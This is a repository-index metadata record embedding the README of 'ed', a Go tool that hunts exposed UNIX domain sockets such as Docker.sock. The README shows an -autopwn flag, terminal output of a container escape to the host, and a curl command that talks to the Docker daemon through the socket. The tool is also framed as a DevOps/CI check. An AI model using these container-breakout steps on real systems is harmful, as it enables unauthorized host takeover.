{"id":44492015,"url":"https://github.com/brompwnie/ed","last_synced_at":"2026-02-13T03:59:16.258Z","repository":{"id":64305061,"uuid":"170169034","full_name":"brompwnie/ed","owner":"brompwnie","description":"Ed is a tool used to identify and exploit accessible UNIX Domain Sockets","archived":false,"fork":false,"pushed_at":"2019-03-11T23:52:12.000Z","size":45,"stargazers_count":27,"open_issues_count":1,"forks_count":7,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-09-22T22:10:53.408Z","etag":null,"topics":["containers","docker","post-exploitation","sockets","unix"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brompwnie.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-02-11T17:13:29.000Z","updated_at":"2024-08-12T19:45:43.000Z","dependencies_parsed_at":"2023-01-15T10:30:16.620Z","dependency_job_id":null,"html_url":"https://github.com/brompwnie/ed","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"purl":"pkg:github/brompwnie/ed","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brompwnie","download_url":"https://codeload.github.com/brompwnie/ed/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste
.ms/api/v1/hosts/GitHub/repositories/brompwnie%2Fed/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29395804,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T00:53:09.511Z","status":"online","status_checked_at":"2026-02-13T02:00:10.076Z","response_time":78,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["containers","docker","post-exploitation","sockets","unix"],"created_at":"2026-02-13T03:59:15.478Z","updated_at":"2026-02-13T03:59:16.244Z","avatar_url":"https://github.com/brompwnie.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ed\nEd is a tool used to identify and exploit accessible UNIX Domain Sockets\n\n# What does it do?\nEd is a binary to help you find and exploit accessible UNIX domain sockets on a container or host. This is useful, for example, for hunting Docker.sock when it has been mounted to a non-default location and/or not mounted with the default name, i.e. \"/var/run/Docker.sock\". \n\n# Why ed?\nFinding exposed UNIX domain sockets, especially Docker.sock, is very useful ;) Ed can be useful in a DevOps process to ensure that containers do not have any unnecessarily exposed sockets or it can be used to exploit exposed sockets to achieve container breakout. 
Additionally, Ed can be used in a CI/CD pipeline.\n\n# Usage\nEd can be used to look for plain 'ol UNIX domain sockets, UNIX domain sockets that respond to HTTP requests or UNIX domain sockets that behave like Docker.sock. Ed by default searches from the CWD. To use Ed, get the binary on the host and use the following options:\n\n ```\n  ./ed -h\n[+] Hunt 'dem Socks\nUsage of ./ed:\n    -autopwn\n        Attempt to autopwn exposed sockets\n  -cicd\n        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0\n  -docker\n        Hunt for docker.sock\n  -http\n        Hunt for Available UNIX Domain Sockets with HTTP\n  -interfaces\n        Display available network interfaces\n  -json\n        Return output in JSON format\n  -path string\n        Path to Start Scanning for UNIX Domain Sockets (default \".\")\n  -socket\n        Hunt for Available UNIX Domain Sockets (default true)\n  -verbose\n        Verbose output\n\n```\n\nExample: Autopwn exposed Docker UNIX Domain Socket\n\n```\nroot@2ae7f389d44c:/app# ./ed -path=/ -autopwn=true\n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /tmp/docker.mock\n[+] Attempting to autopwn\n[+] Hunting Docker Socks\n[+] Attempting to Autopwn:  /tmp/docker.mock\n[*] Getting Docker client...\n[*] Successfully got Docker client...\n[+] Attempting to escape to host...\nYou are now on the underlying host\n/ # \n/ # exit\n[*] Successfully exited TTY\n[+] Finished\n```\n\n Example: Look for exposed Docker.sock\n \n ```\n root@2ae7f389d44c:/app# ./ed -path=/    \n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /run/docker.sock\n \n ```\n \n Example: Look for exposed Docker.sock, attempt to pwn it and return an exit code of 1 for your CI\\CD test\n \n ```\n root@2ae7f389d44c:/app# ./ed_linux_amd64 -path=/ -cicd=true -autopwn=true\n[+] Hunt 'dem Socks\n[+] Hunting Down UNIX Domain Sockets from: /\n[*] Valid Socket: /run/docker.sock\n[+] 
Attempting to autopwn\n[+] Hunting Docker Socks\n[+] Attempting to Autopwn:  /run/docker.sock\n[*] Getting Docker client...\n[*] Successfully got Docker client...\n[+] Attempting to escape to host...\n[+] Attempting in CICD Mode\n[+] Finished\nroot@d20b953fc52f:/app# echo $?\n1\n \n ```\n \n And now that you have found an exposed Docker socket, you could go ahead and issue commands to the Docker daemon using CURL or just issue the -autopwn flag ;):\n \n ```\n root@70a7cf3d4f93:/app# curl --unix-socket  /var/run/docker.sock http:/docker/info\n ..l00t\n ```\n \n # Testing\nEd can be tested with Docker. WARNING: mounting Docker.sock into containers is a very bad idea, but if you want to test Ed, you can with the following:\n\n```\ndocker-compose build \u0026\u0026 docker-compose up\n...\nworker_1_fd52bdee04ce | [+] Hunt 'dem Socks\nworker_1_fd52bdee04ce | [+] Hunting Down UNIX Domain Sockets from: /\nworker_1_fd52bdee04ce | [*] Valid Socket: /run/docker.sock\ned_worker_1_fd52bdee04ce exited with code 0\n\n```\n\n# Demo\n\n[![asciicast](https://asciinema.org/a/oUkKmXvOGrT9QVbw8iQlbUxpA.png)](https://asciinema.org/a/oUkKmXvOGrT9QVbw8iQlbUxpA)\n \n # License\n Ed is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrompwnie%2Fed","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrompwnie%2Fed","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrompwnie%2Fed/lists"}